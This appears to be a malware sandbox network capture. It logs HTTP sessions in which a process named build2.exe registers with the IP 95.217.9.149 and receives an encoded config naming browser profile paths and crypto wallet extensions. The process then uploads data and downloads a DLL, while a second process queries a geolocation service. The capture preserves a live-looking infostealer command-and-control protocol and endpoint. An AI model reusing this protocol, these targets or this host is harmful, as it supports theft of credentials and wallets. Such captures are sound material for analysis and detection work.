                                                                                                                                      2024-04-24 12:42:15 UTC9214INData Raw: 74 65 61 6d 67 61 6d 65 73 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 70 61 72 74 6e 65 72 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 54 45 52 4e 41 4c 5f 53 54 41 54 53 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 65 61 6d 73 74 61 74 73 2e 76 61 6c 76 65 2e 6f 72 67 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 49 4e 5f 43 4c 49 45 4e 54 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 55 53 45 5f 50 4f 50 55 50 53 26 71 75 6f 74 3b 3a 66 61 6c 73 65 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 49 43 4f 4e 5f 42 41
                                                                                                                                      Data Ascii: teamgames.com\/&quot;,&quot;STATS_BASE_URL&quot;:&quot;https:\/\/partner.steampowered.com\/&quot;,&quot;INTERNAL_STATS_BASE_URL&quot;:&quot;https:\/\/steamstats.valve.org\/&quot;,&quot;IN_CLIENT&quot;:false,&quot;USE_POPUPS&quot;:false,&quot;STORE_ICON_BA


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.74970795.217.9.1494437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:17 UTC169OUTGET / HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                      Host: 95.217.9.149
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:18 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 12:42:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.749708104.21.65.244437692C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:18 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: api.2ip.ua
                                                                                                                                      2024-04-24 12:42:19 UTC910INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:19 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0vqeit8X7w3LOZdINK2Ula5MTJ4j5j7nbtZEDWQo8zQ1A8xmhHm6I5tZX%2FXqrRSsyOJ64Lo7bPuLB19lEnxH2htKrRq9nhL1dF8vAiwtlNUJA6korlNxoUbBgHA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 87962c2d58922f77-LAX
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 12:42:19 UTC459INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 32 32 34 61 34 37 34 65 35 32 36 32 31 30 34 62 35 32 30 63 34 66 34 37 31 64 35 31 35 37 34 30 34 38 34 37 34 31
                                                                                                                                      Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#224a474e5262104b520c4f471d515740484741
                                                                                                                                      2024-04-24 12:42:19 UTC471INData Raw: d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 35 65 33 36 33 62 33 32 32 65 31 65 36 63 33 37 32 65 37 30 32 62 33 66 36 31 32 64 32 62 33 63 33 34 33 62 33 64 32 61 36 33 36 63 33 37 32 65 37 30 32 62 33 66 22 3e 3c 73
                                                                                                                                      Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#5e363b322e1e6c372e702b3f612d2b3c343b3d2a636c372e702b3f"><s
                                                                                                                                      2024-04-24 12:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.74970995.217.9.1494437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:19 UTC261OUTPOST / HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----AFBAKKFCBFHIIEBGIDBG
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                      Host: 95.217.9.149
                                                                                                                                      Content-Length: 279
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:19 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 41 45 34 34 30 31 31 39 42 41 31 39 30 34 36 36 35 39 35 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 4b 4b 46 43 42 46 48 49 49 45 42 47 49 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d
                                                                                                                                      Data Ascii: ------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="hwid"12AE440119BA1904665954-a33c7340-61ca-11ee-8c18-806e6f6e6963------AFBAKKFCBFHIIEBGIDBGContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------
                                                                                                                                      2024-04-24 12:42:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:20 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 12:42:21 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 35 65 39 37 37 37 31 63 65 66 34 32 63 33 63 61 35 63 39 61 65 38 34 36 33 36 38 35 63 34 35 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 3a1|1|1|1|5e97771cef42c3ca5c9ae8463685c457|1|1|1|0|0|50000|00


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.74971695.217.9.1494437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:21 UTC261OUTPOST / HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----IIEBKJECFCFBFIECBKFB
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                      Host: 95.217.9.149
                                                                                                                                      Content-Length: 331
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:21 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 39 37 37 37 31 63 65 66 34 32 63 33 63 61 35 63 39 61 65 38 34 36 33 36 38 35 63 34 35 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 4b 4a 45 43 46 43 46 42 46 49 45 43 42 4b 46 42 0d 0a 43 6f 6e 74
                                                                                                                                      Data Ascii: ------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="token"5e97771cef42c3ca5c9ae8463685c457------IIEBKJECFCFBFIECBKFBContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------IIEBKJECFCFBFIECBKFBCont
                                                                                                                                      2024-04-24 12:42:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:22 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 12:42:22 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.74971795.217.9.1494437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:23 UTC261OUTPOST / HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFH
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                      Host: 95.217.9.149
                                                                                                                                      Content-Length: 331
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:23 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 39 37 37 37 31 63 65 66 34 32 63 33 63 61 35 63 39 61 65 38 34 36 33 36 38 35 63 34 35 37 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 48 44 48 43 46 49 4a 44 42 46 48 4a 4a 44 42 46 48 0d 0a 43 6f 6e 74
                                                                                                                                      Data Ascii: ------HIEHDHCFIJDBFHJJDBFHContent-Disposition: form-data; name="token"5e97771cef42c3ca5c9ae8463685c457------HIEHDHCFIJDBFHJJDBFHContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------HIEHDHCFIJDBFHJJDBFHCont
                                                                                                                                      2024-04-24 12:42:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:24 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 12:42:24 UTC5165INData Raw: 31 34 32 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                      Data Ascii: 1420TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.74971895.217.9.1494437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:25 UTC262OUTPOST / HTTP/1.1
                                                                                                                                      Content-Type: multipart/form-data; boundary=----CAFBGDHCBAEHIDGCGIDA
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                      Host: 95.217.9.149
                                                                                                                                      Content-Length: 7085
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:25 UTC7085OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 39 37 37 37 31 63 65 66 34 32 63 33 63 61 35 63 39 61 65 38 34 36 33 36 38 35 63 34 35 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 37 30 36 64 63 36 63 39 32 30 32 34 33 30 62 63 36 66 62 32 65 37 34 38 39 36 64 38 33 31 31 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 42 47 44 48 43 42 41 45 48 49 44 47 43 47 49 44 41 0d 0a 43 6f 6e 74
                                                                                                                                      Data Ascii: ------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="token"5e97771cef42c3ca5c9ae8463685c457------CAFBGDHCBAEHIDGCGIDAContent-Disposition: form-data; name="build_id"1706dc6c9202430bc6fb2e74896d8311------CAFBGDHCBAEHIDGCGIDACont
                                                                                                                                      2024-04-24 12:42:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:26 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 12:42:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.749719104.21.65.244437972C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:26 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                      Host: api.2ip.ua
                                                                                                                                      2024-04-24 12:42:27 UTC910INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:27 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                      access-control-allow-origin: *
                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3XsNYovbpYcgrCmo46LxchulWkh7DcrsiMBp8%2BlpqtF3DLXhjChN9Za9dMMEbz8mLwqAYzk1Ykd77LeMMG6H2O6QU7lPFlDbv5E8paX2dPACRIiZc6h%2BHIhNZGS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 87962c5d49fb1026-LAX
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-04-24 12:42:27 UTC459INData Raw: 33 39 62 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 63 63 61 34 61 39 61 30 62 63 38 63 66 65 61 35 62 63 65 32 61 31 61 39 66 33 62 66 62 39 61 65 61 36 61 39 61 66
                                                                                                                                      Data Ascii: 39b<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="/cdn-cgi/l/email-protection#cca4a9a0bc8cfea5bce2a1a9f3bfb9aea6a9af
                                                                                                                                      2024-04-24 12:42:27 UTC471INData Raw: d0 b0 d0 b7 d0 b5 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 2e 20 d0 94 d0 bb d1 8f 20 d0 bf d0 be d0 bb d1 83 d1 87 d0 b5 d0 bd d0 b8 d1 8f 20 d0 b4 d0 be d0 bf d0 be d0 bb d0 bd d0 b8 d1 82 d0 b5 d0 bb d1 8c d0 bd d0 be d0 b9 20 d0 b8 d0 bd d1 84 d0 be d1 80 d0 bc d0 b0 d1 86 d0 b8 d0 b8 2c 20 d0 bf d0 be d0 b6 d0 b0 d0 bb d1 83 d0 b9 d1 81 d1 82 d0 b0 2c 20 d0 be d0 b1 d1 80 d0 b0 d1 89 d0 b0 d0 b9 d1 82 d0 b5 63 d1 8c 20 d0 bf d0 be 20 d0 b0 d0 b4 d1 80 d0 b5 d1 81 d1 83 20 3c 61 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 6c 2f 65 6d 61 69 6c 2d 70 72 6f 74 65 63 74 69 6f 6e 23 39 30 66 38 66 35 66 63 65 30 64 30 61 32 66 39 65 30 62 65 65 35 66 31 61 66 65 33 65 35 66 32 66 61 66 35 66 33 65 34 61 64 61 32 66 39 65 30 62 65 65 35 66 31 22 3e 3c 73
                                                                                                                                      Data Ascii: . , , c <a href="/cdn-cgi/l/email-protection#90f8f5fce0d0a2f9e0bee5f1afe3e5f2faf5f3e4ada2f9e0bee5f1"><s
                                                                                                                                      2024-04-24 12:42:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.74972095.217.9.1494437540C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 12:42:27 UTC177OUTGET /sqln.dll HTTP/1.1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                      Host: 95.217.9.149
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-04-24 12:42:28 UTC248INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 12:42:27 GMT
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Content-Length: 2459136
                                                                                                                                      Last-Modified: Sun, 14 Apr 2024 18:52:51 GMT
                                                                                                                                      Connection: close
                                                                                                                                      ETag: "661c2603-258600"
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-04-24 12:42:28 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
